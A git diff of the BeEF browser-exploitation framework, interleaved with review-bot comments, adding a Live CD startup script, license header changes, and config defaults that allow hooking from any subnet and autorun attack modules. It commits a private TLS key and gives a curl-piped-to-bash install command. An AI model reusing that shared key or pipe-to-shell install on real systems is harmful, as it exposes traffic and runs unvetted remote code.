diff --git a/BeEFLive.sh b/BeEFLive.sh
new file mode 100644
index 000000000..14fedd039
--- /dev/null
+++ b/BeEFLive.sh
@@ -0,0 +1,110 @@
+#!/bin/bash
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'home/beef/doc/COPYING' for copying permission
+#
+
+
+#
+# This is the auto startup script for the BeEF Live CD.
+# IT SHOULD ONLY BE RUN ON THE LIVE CD
+# Download LiveCD here: https://github.com/beefproject/beef/downloads
+#
+# This script contains a few fixes to make BeEF play nicely with the way
+# remastersys creates the live cd distributable as well as generating host keys
+# to enable SSH etc. The script also make it easy for the user to update/start
+# the BeEF server
+#
+clear
+echo "======================================"
+echo " BeEF Live CD "
+echo "======================================"
+echo ""
+echo "Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net"
+echo "Browser Exploitation Framework (BeEF) - http://beefproject.com"
+echo "See the file 'home/beef/doc/COPYING' for copying permission"
+echo ""
+
+echo "Welcome to the BeEF Live CD"
+echo ""
+echo ""
+
+#
+# Check for SSH Host Keys - if they do not exist ask user if they should be
+# created (remastersys has a habit of deleting them during Live CD Creation)
+#
+f1="/etc/ssh/ssh_host_rsa_key"
+if [ -f $f1 ]
+then
+ echo ""
+else
+ echo -n "Would you like to enable ssh (y/N)? "
+ read var
+
+ if [ $var = "y" ] ; then
+ sudo ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key -N ''
+ sudo ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key -N ''
+ echo ""
+ echo "Please provide a password for ssh user: beef"
+ sudo passwd beef
+ echo "ssh enabled"
+ fi
+fi
+echo ""
+
+#
+# Prompt the user if they would like to update BeEF and
+# other components installed (such as sqlmap and msf)
+#
+echo -n "Check and install updates for BeEF (y/N)? "
+read var
+
+if [ $var = "y" ] ; then
+ cd /opt/beef
+ git stash
+ git pull
+fi
+echo ""
+
+echo -n "Check and install updates for msf and sqlmap (y/N)? "
+read var
+
+if [ $var = "y" ] ; then
+ cd /opt/sqlmap
+ git stash
+ git pull
+ cd /opt/metasploit-framework
+ git stash
+ git pull
+fi
+
+
+#
+# Create a shortcut in the user's home folder to BeEF, msf and sqlmap
+# (if they do not yet exist)
+#
+f1="beef"
+if [ -f $f1 ] ; then
+ echo ""
+else
+ ln -s /opt/beef/ beef
+ ln -s /opt/metasploit-framework/ msf
+ ln -s /opt/sqlmap/ sqlmap
+fi
+
+#
+# Prompt the user if they would like start BeEF
+#
+echo -n "Start BeEF (y/N)? "
+read var
+
+if [ $var = "y" ] ; then
+ echo ""
+ echo "Starting BeEF..";
+
+ cd /opt/beef
+ ruby beef -x
+fi
+
+
diff --git a/Gemfile b/Gemfile
index cd4bb331e..06cf6daff 100644
--- a/Gemfile
+++ b/Gemfile
@@ -1,19 +1,9 @@ # BeEF's Gemfile # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # Gems only required on Windows, or with specific Windows issues
@@ -39,6 +29,9 @@ gem "erubis" gem "dm-migrations" gem "msfrpc-client" +# notifications +gem "twitter" + if ENV['BEEF_TEST'] # for running unit tests gem "test-unit"
diff --git a/INSTALL.txt b/INSTALL.txt
index fcf9719c5..552ccfc6d 100644
--- a/INSTALL.txt
+++ b/INSTALL.txt
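Review bot: The four `[ $var = "y" ]` tests in BeEFLive.sh are unquoted, so pressing Enter to take the default "N" leaves `$var` empty and `[` reports an error instead of skipping cleanly; use `read -r var` and `[ "$var" = "y" ]`. The update blocks `cd` into /opt/... in the main shell without checking the result, so a failed `cd` runs `git stash` and `git pull` in whatever directory is current, and a successful one means the later relative `ln -s /opt/beef/ beef` creates the shortcuts under /opt rather than in the home folder. The guard `[ -f $f1 ]` is also never true for a symlink to a directory, so the links are re-attempted on every run. Separately, the `ssh-keygen -t dsa` line is worth dropping, since DSA host keys are limited to 1024 bits.

```shell
# … unchanged: banner, ssh host-key section (same quoting fix on its test) …
read -r var
if [ "$var" = "y" ] ; then
  # subshell: the script's working directory is left untouched,
  # and git only runs when the cd succeeded
  ( cd /opt/beef && git stash && git pull )
fi
# … unchanged: msf/sqlmap prompt, same pattern for each repository …
if [ ! -e "$HOME/beef" ] && [ ! -L "$HOME/beef" ] ; then
  ln -s /opt/beef/ "$HOME/beef"
  ln -s /opt/metasploit-framework/ "$HOME/msf"
  ln -s /opt/sqlmap/ "$HOME/sqlmap"
fi
# … unchanged: "Start BeEF" prompt …
```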
@@ -1,18 +1,8 @@ =============================================================================== - Copyright 2012 Wade Alcorn wade@bindshell.net - - Licensed under the Apache License, Version 2.0 (the "License"); - you may not use this file except in compliance with the License. - You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - - Unless required by applicable law or agreed to in writing, software - distributed under the License is distributed on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - See the License for the specific language governing permissions and - limitations under the License. + Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + Browser Exploitation Framework (BeEF) - http://beefproject.com + See the file 'doc/COPYING' for copying permission =============================================================================== diff --git a/README b/README index cdca66e3c..e91bcb000 100644 --- a/README +++ b/README 
@@ -1,84 +1,74 @@ -=============================================================================== - - Copyright 2012 Wade Alcorn wade@bindshell.net - - Licensed under the Apache License, Version 2.0 (the "License"); - you may not use this file except in compliance with the License. - You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - - Unless required by applicable law or agreed to in writing, software - distributed under the License is distributed on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - See the License for the specific language governing permissions and - limitations under the License. - -=============================================================================== - -What is BeEF? -------------- - -BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. - -Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context. - - -Get Involved ------------- - -You can get in touch with the BeEF team. Just check out the following: - - -Please, send us pull requests! 
- -Web: http://beefproject.com/ - -Mail: beef-subscribe@bindshell.net - -IRC: ircs://irc.freenode.net/beefproject - -Twitter: @beefproject - - -Requirements ------------- - -* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher -* [Ruby](http://rubylang.org) 1.9.2 RVM or higher -* [SQLite](http://sqlite.org) 3.x -* The following GEMS: - - bundler - - thin - - Sinatra - - ANSI - - TERM-ANSIcolor - - dm-core - - json - - data_objects - - dm-sqlite-adapter - - parseconfig - - erubis - - dm-migrations - - msfrpc-client - - eventmachine - - win32console (Windows Only) - - -Quick Start ------------ - -__The following is for the impatient.__ - -For full installation details (including on Microsoft Windows), please refer to INSTALL.txt. - - $ bash -s stable < <(curl -s https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef) - - -Usage ------ - -To get started, simply execute beef and follow the instrustions: - - $ ./beef - +=============================================================================== + + Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + Browser Exploitation Framework (BeEF) - http://beefproject.com + See the file 'doc/COPYING' for copying permission + +=============================================================================== + +What is BeEF? +------------- + +BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser. + +Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. 
BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context. + + +Get Involved +------------ + +You can get in touch with the BeEF team. Just check out the following: + + +Please, send us pull requests! + +Web: http://beefproject.com/ + +Mail: beef-subscribe@bindshell.net + +IRC: ircs://irc.freenode.net/beefproject + +Twitter: @beefproject + + +Requirements +------------ + +* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher +* [Ruby](http://rubylang.org) 1.9.2 RVM or higher +* [SQLite](http://sqlite.org) 3.x +* The following GEMS: + - bundler + - thin + - Sinatra + - ANSI + - TERM-ANSIcolor + - dm-core + - json + - data_objects + - dm-sqlite-adapter + - parseconfig + - erubis + - dm-migrations + - msfrpc-client + - eventmachine + - win32console (Windows Only) + + +Quick Start +----------- + +__The following is for the impatient.__ + +For full installation details (including on Microsoft Windows), please refer to INSTALL.txt. + + $ bash -s stable < <(curl -s https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef) + + +Usage +----- + +To get started, simply execute beef and follow the instrustions: + + $ ./beef + diff --git a/README.mkd b/README.mkd index 79df0d1af..498d190c9 100644 --- a/README.mkd +++ b/README.mkd 
@@ -1,84 +1,74 @@ -=============================================================================== - - Copyright 2012 Wade Alcorn wade@bindshell.net - - Licensed under the Apache License, Version 2.0 (the "License"); - you may not use this file except in compliance with the License. - You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - - Unless required by applicable law or agreed to in writing, software - distributed under the License is distributed on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - See the License for the specific language governing permissions and - limitations under the License. - -=============================================================================== - -What is BeEF? -------------- - -__BeEF__ is short for __The Browser Exploitation Framework__. It is a penetration testing tool that focuses on the web browser. - -Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context. - - -Get Involved ------------- - -You can get in touch with the BeEF team. 
Just check out the following: - - -__Please, send us pull requests!__ - -__Web:__ http://beefproject.com/ - -__Mail:__ beef-subscribe@bindshell.net - -__IRC:__ ircs://irc.freenode.net/beefproject - -__Twitter:__ @beefproject - - -Requirements ------------- - -* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher -* [Ruby](http://rubylang.org) 1.9.2 RVM or higher -* [SQLite](http://sqlite.org) 3.x -* The following GEMS: - - bundler - - thin - - Sinatra - - ANSI - - TERM-ANSIcolor - - dm-core - - json - - data_objects - - dm-sqlite-adapter - - parseconfig - - erubis - - dm-migrations - - msfrpc-client - - eventmachine - - win32console (Windows Only) - - -Quick Start ------------ - -__The following is for the impatient.__ - -For full installation details (including on Microsoft Windows), please refer to INSTALL.txt. - - $ bash -s stable < <(curl -s https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef) - - -Usage ------ - -To get started, simply execute beef and follow the instructions: - - $ ./beef - +=============================================================================== + + Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + Browser Exploitation Framework (BeEF) - http://beefproject.com + See the file 'doc/COPYING' for copying permission + +=============================================================================== + +What is BeEF? +------------- + +__BeEF__ is short for __The Browser Exploitation Framework__. It is a penetration testing tool that focuses on the web browser. + +Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. 
BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context. + + +Get Involved +------------ + +You can get in touch with the BeEF team. Just check out the following: + + +__Please, send us pull requests!__ + +__Web:__ http://beefproject.com/ + +__Mail:__ beef-subscribe@bindshell.net + +__IRC:__ ircs://irc.freenode.net/beefproject + +__Twitter:__ @beefproject + + +Requirements +------------ + +* OSX 10.5.0 or higher, Modern Linux, Windows XP or higher +* [Ruby](http://rubylang.org) 1.9.2 RVM or higher +* [SQLite](http://sqlite.org) 3.x +* The following GEMS: + - bundler + - thin + - Sinatra + - ANSI + - TERM-ANSIcolor + - dm-core + - json + - data_objects + - dm-sqlite-adapter + - parseconfig + - erubis + - dm-migrations + - msfrpc-client + - eventmachine + - win32console (Windows Only) + + +Quick Start +----------- + +__The following is for the impatient.__ + +For full installation details (including on Microsoft Windows), please refer to INSTALL.txt. + + $ curl https://raw.github.com/beefproject/beef/a6a7536e/install-beef | bash -s stable + + +Usage +----- + +To get started, simply execute beef and follow the instructions: + + $ ./beef + diff --git a/Rakefile b/Rakefile index adb1a8d14..d110ed104 100644 --- a/Rakefile +++ b/Rakefile 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # task :default => ["quick"] diff --git a/VERSION b/VERSION index 509c304b2..b4a0a0eda 100644 --- a/VERSION +++ b/VERSION @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # -0.4.3.5-alpha +0.4.3.9-alpha diff --git a/beef b/beef index 6302be317..b8a1abefe 100755 --- a/beef +++ b/beef 
@@ -1,19 +1,9 @@ #!/usr/bin/env ruby # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # stop deprecation warning from being displayed @@ -81,7 +71,7 @@ Socket.do_not_reverse_lookup = true case config.get("beef.database.driver") when "sqlite" DataMapper.setup(:default, "sqlite3://#{$root_dir}/#{config.get("beef.database.db_file")}") - when "mysql","postgres" + when "mysql", "postgres" DataMapper.setup(:default, :adapter => config.get("beef.database.driver"), :host => config.get("beef.database.db_host"), 
@@ -124,12 +114,13 @@ print_info "RESTful API key: #{BeEF::Core::Crypto::api_token}" #@note Starts the WebSocket server if config.get("beef.http.websocket.enable") BeEF::Core::Websocket::Websocket.instance - print_info "Starting WebSocket server on port [#{config.get("beef.http.websocket.port").to_i}], secure [#{config.get("beef.http.websocket.secure")}], timer [#{config.get("beef.http.websocket.alive_timer")}]" + print_info "Starting WebSocket server on port [#{config.get("beef.http.websocket.port").to_i}], timer [#{config.get("beef.http.websocket.alive_timer")}]" + if config.get("beef.http.websocket.secure") + print_info "Starting WebSocketSecure server on port [#{config.get("beef.http.websocket.secure_port").to_i}], timer [#{config.get("beef.http.websocket.alive_timer")}]" + end end - - # @note Call the API method 'pre_http_start' BeEF::API::Registrar.instance.fire(BeEF::API::Server, 'pre_http_start', http_hook_server) @@ -140,7 +131,7 @@ if config.get("beef.extension.console.shell.enable") == true begin FileUtils.mkdir_p(File.expand_path(config.get("beef.extension.console.shell.historyfolder"))) BeEF::Extension::Console::Shell.new(BeEF::Extension::Console::Shell::DefaultPrompt, - BeEF::Extension::Console::Shell::DefaultPromptChar,{'config' => config, 'http_hook_server' => http_hook_server}).run + BeEF::Extension::Console::Shell::DefaultPromptChar, {'config' => config, 'http_hook_server' => http_hook_server}).run rescue Interrupt end else diff --git a/beef_cert.pem b/beef_cert.pem new file mode 100644 index 000000000..9ac7ab1ba --- /dev/null +++ b/beef_cert.pem 
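Review bot: Both new `print_info` lines still read `beef.http.websocket.alive_timer`, but the config.yaml hunk in this same commit removes `alive_timer` and adds `ws_poll_timeout`, so with the shipped config the timer field will presumably print empty; read `beef.http.websocket.ws_poll_timeout` instead. The WebSocketSecure line is gated only on `beef.http.websocket.secure`, which config.yaml now defaults to `true` while `beef.http.https.enable` stays `false`, so the startup banner can announce a secure listener whose stated prerequisite is not met. Checking both flags, `if config.get("beef.http.websocket.secure") && config.get("beef.http.https.enable")`, would keep the log trustworthy; whether the WebSocket server itself makes that check is not visible here. The surrounding startup code begins and ends outside the hunk.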
@@ -0,0 +1,19 @@ +-----BEGIN CERTIFICATE----- +MIIDDjCCAnegAwIBAgIJAKNYRH/AaB3DMA0GCSqGSIb3DQEBBQUAMIGfMQswCQYD +VQQGEwJBVTEUMBIGA1UECAwLQm92aW5lIExhbmQxDTALBgNVBAcMBEJlRUYxDTAL +BgNVBAoMBEJlRUYxDTALBgNVBAsMBEJlRUYxJzAlBgNVBAMMHkJyb3dzZXIgRXhw +bG9pdGF0aW9uIEZyYW1ld29yazEkMCIGCSqGSIb3DQEJARYVQmVFRkBkb250d3Jp +dGVtZS5CZUVGMB4XDTEyMDgwNjEzMDUzOFoXDTEzMDgwNjEzMDUzOFowgZ8xCzAJ +BgNVBAYTAkFVMRQwEgYDVQQIDAtCb3ZpbmUgTGFuZDENMAsGA1UEBwwEQmVFRjEN +MAsGA1UECgwEQmVFRjENMAsGA1UECwwEQmVFRjEnMCUGA1UEAwweQnJvd3NlciBF +eHBsb2l0YXRpb24gRnJhbWV3b3JrMSQwIgYJKoZIhvcNAQkBFhVCZUVGQGRvbnR3 +cml0ZW1lLkJlRUYwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBALCxzu+rOTt2 +VBM5X5KL2xpDvMJ7wT0BSVgbkEF9Pd3+h3NbB/LST0n+Mwtnk4wLzmjmNiob3EdP +0l+pKgIZYT8yHMvI3pwp0hmpE3D2bALyiQTOTjF0IhUeIYa9ZhEyeN+PgA6+Hs0Z +F/0y0El2XjkPF42Dnmp9mLTSfScv1v4xAgMBAAGjUDBOMB0GA1UdDgQWBBTaXny0 +kTye7CAr0ronsg0ob63+kTAfBgNVHSMEGDAWgBTaXny0kTye7CAr0ronsg0ob63+ +kTAMBgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBBQUAA4GBABTy5s/XRd6iBwxOgV6N +B+cTRgmgHciujbI+0p4TkOkHvQPhhcD3207ndWWwv+Mc2XeQcXNaOfYUDkeCs64N +JffqThykYOdagvCu1Gecw9BEKeijS9MAuNvtvP7fcUNUql+VeTFbxMBPGDhusafz +GkY0IBg9+j6XX4JwEXxCGt0a +-----END CERTIFICATE----- diff --git a/beef_key.pem b/beef_key.pem new file mode 100644 index 000000000..1c2fc0ea9 --- /dev/null +++ b/beef_key.pem 
@@ -0,0 +1,16 @@ +-----BEGIN PRIVATE KEY----- +MIICeAIBADANBgkqhkiG9w0BAQEFAASCAmIwggJeAgEAAoGBALCxzu+rOTt2VBM5 +X5KL2xpDvMJ7wT0BSVgbkEF9Pd3+h3NbB/LST0n+Mwtnk4wLzmjmNiob3EdP0l+p +KgIZYT8yHMvI3pwp0hmpE3D2bALyiQTOTjF0IhUeIYa9ZhEyeN+PgA6+Hs0ZF/0y +0El2XjkPF42Dnmp9mLTSfScv1v4xAgMBAAECgYAKpDrNTmedACxiGAN8hPXGKCw3 +HlLuBKTRLJ/Mgel29DxeIy5gXnAuCaQzXKKTPabJxIugj5r9pH4MCtkf1T15Aib6 +4MFdx4UegllMUo7eUiuCtSmK9s0wEtJjShujBl4qQ10ZtWUh4Vd/clS88IjM/iPI +5Ocoph5PUgFt/tX7DQJBAOkGptgdri39bRiSGaR/Si6YYpmMUFoQt+s2id8yH9QS +26o8cHZKCahSiWLNi4rSzEJIOpXnP3n+Dcq2JttDWGcCQQDCHWgWSpdnX8uqp/Qo +yp0RZJwyBFoba4bWhzoQJj+39P0+4FBaMlZyLHZ7nd4z0JiE5S3qA9xi8zjQVrrI +rTWnAkEAmpPxBZfavWNJhW0VWYue1/36GkV73+MLPhq1pruHZZUE5o6lQ7KlaWUn +AcW79WEUYjursVjvQKuI1pmyeOzZrQJBAIGQHSxbxyjBgPA8QDSF4EZ+r96Wlwoc +QBiqk6+5x+fiBrJUCG3bkWWNldu2qFxPS63QRlAfGZeWHgK5ENzm95sCQQCe81hU +WaVM9bmt0ZvfhfQXfgvf3xKNUFemd4skTMUDgNCH1OFULB/Mz16kJDdy0q0qUS88 +yBgay+U9QuoEO425 +-----END PRIVATE KEY----- diff --git a/config.yaml b/config.yaml index 41728f809..567ab7b05 100644 --- a/config.yaml +++ b/config.yaml 
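Review bot: beef_key.pem commits the private key for beef_cert.pem to the repository, and the config.yaml change in this commit points `beef.http.https.key` and `cert` at the pair, so every installation that enables HTTPS with the defaults shares a key anyone can download. TLS with this pair gives no real confidentiality or server authentication for the admin UI or the hook traffic. The key also appears to be 1024-bit RSA. Prefer generating a fresh key and self-signed certificate at install or first start, keeping `*.pem` out of version control, and printing a startup warning while the shipped defaults are still configured.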
@@ -1,35 +1,29 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # BeEF Configuration file beef: - version: '0.4.3.5-alpha' + version: '0.4.3.9-alpha' debug: false restrictions: - # subnet of browser ip addresses that can hook to the framework + # subnet of browser ip addresses that can hook to the framework permitted_hooking_subnet: "0.0.0.0/0" - # subnet of browser ip addresses that can connect to the UI + # subnet of browser ip addresses that can connect to the UI # permitted_ui_subnet: "127.0.0.1/32" permitted_ui_subnet: "0.0.0.0/0" - + http: debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace. host: "0.0.0.0" port: "3000" + # Decrease this setting up to 1000 if you want more responsiveness when sending modules and retrieving results. + # It's not advised to decrease it with tons of hooked browsers (more than 50), + # because it might impact performance. Also, enable WebSockets is generally better. + xhr_poll_timeout: 5000 # if running behind a nat set the public ip address here #public: "" #public_port: "" # port setting is experimental 
@@ -42,25 +36,40 @@ beef: # Prefer WebSockets over XHR-polling when possible. websocket: enable: false - secure: false # use WebSocketSecure - port: 11989 - alive_timer: 1000 # poll BeEF every second + secure: true # use WebSocketSecure work only on https domain and whit https support enabled in BeEF + port: 61985 # WS: good success rate through proxies + secure_port: 61986 # WSSecure + ws_poll_timeout: 1000 # poll BeEF every second # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header) web_server_imitation: enable: false type: "apache" #supported: apache, iis + # Experimental HTTPS support for the hook / admin / all other Thin managed web services + https: + enable: false + # In production environments, be sure to use a valid certificate signed for the value + # used in beef.http.dns (the domain name of the server where you run BeEF) + key: "beef_key.pem" + cert: "beef_cert.pem" + database: # For information on using other databases please read the # README.databases file # supported DBs: sqlite, mysql, postgres + # NOTE: you must change the Gemfile adding a gem require line like: + # gem "dm-postgres-adapter" + # or + # gem "dm-mysql-adapter" + # if you want to switch drivers from sqlite to postgres (or mysql). + # Finally, run a 'bundle install' command and start BeEF. driver: "sqlite" # db_file is only used for sqlite db_file: "beef.db" - + # db connection information is only used for mysql/postgres db_host: "localhost" db_name: "beef" 
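Review bot: `secure: true` is now the default under `websocket` while the new `https` block defaults to `enable: false`, although the comment on that same line says WebSocketSecure works only with HTTPS support enabled, so the two defaults contradict each other. Keep `secure: false` until `https.enable` is turned on, or state in the comment that `secure` is ignored without HTTPS. The comment would read better as `# use WebSocketSecure; works only on an https domain and with HTTPS support enabled in BeEF`. Since the `https` block defaults to the key and certificate files added in this commit, a comment saying that the shipped pair is public and must be replaced before any real use belongs next to `key:` and `cert:`.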
@@ -73,18 +82,29 @@ beef: user: "beef" passwd: "beef" + # Autorun modules as soon the browser is hooked. + # NOTE: only modules with target type 'working' or 'user_notify' can be run automatically. + autorun: + enable: true + # set this to FALSE if you don't want to allow auto-run execution for modules with target->user_notify + allow_user_notify: true + crypto_default_value_length: 80 # You may override default extension configuration parameters here extension: requester: - enable: true + enable: true proxy: - enable: true + enable: true metasploit: enable: false - console: - shell: - enable: false + social_engineering: + enable: true evasion: enable: false + console: + shell: + enable: false + ipec: + enable: true diff --git a/core/api.rb b/core/api.rb index 0d845d02d..162805b9f 100644 --- a/core/api.rb +++ b/core/api.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF diff --git a/core/api/extension.rb b/core/api/extension.rb index 1358e32d2..87121854c 100644 --- a/core/api/extension.rb +++ b/core/api/extension.rb 
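Review bot: `autorun.enable: true` together with `allow_user_notify: true` makes automatic module execution the out-of-the-box behaviour, so an operator who starts the framework without reading the config gets modules, including ones that prompt the user, run on every browser that connects. For a testing tool with scope obligations, opt-in is the safer default: `enable: false` and `allow_user_notify: false`, with the comment explaining how to turn them on. The same hunk enables the `social_engineering` and `ipec` extensions by default without any description; a one-line comment per new extension saying what it exposes would help whoever audits this file later.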
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF diff --git a/core/api/extensions.rb b/core/api/extensions.rb index 5d5be8cb2..37833042a 100644 --- a/core/api/extensions.rb +++ b/core/api/extensions.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module API diff --git a/core/api/main/configuration.rb b/core/api/main/configuration.rb index d047068a3..119ea40c2 100644 --- a/core/api/main/configuration.rb +++ b/core/api/main/configuration.rb 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # module BeEF module API diff --git a/core/api/main/migration.rb b/core/api/main/migration.rb index 947503c41..298d29148 100644 --- a/core/api/main/migration.rb +++ b/core/api/main/migration.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# 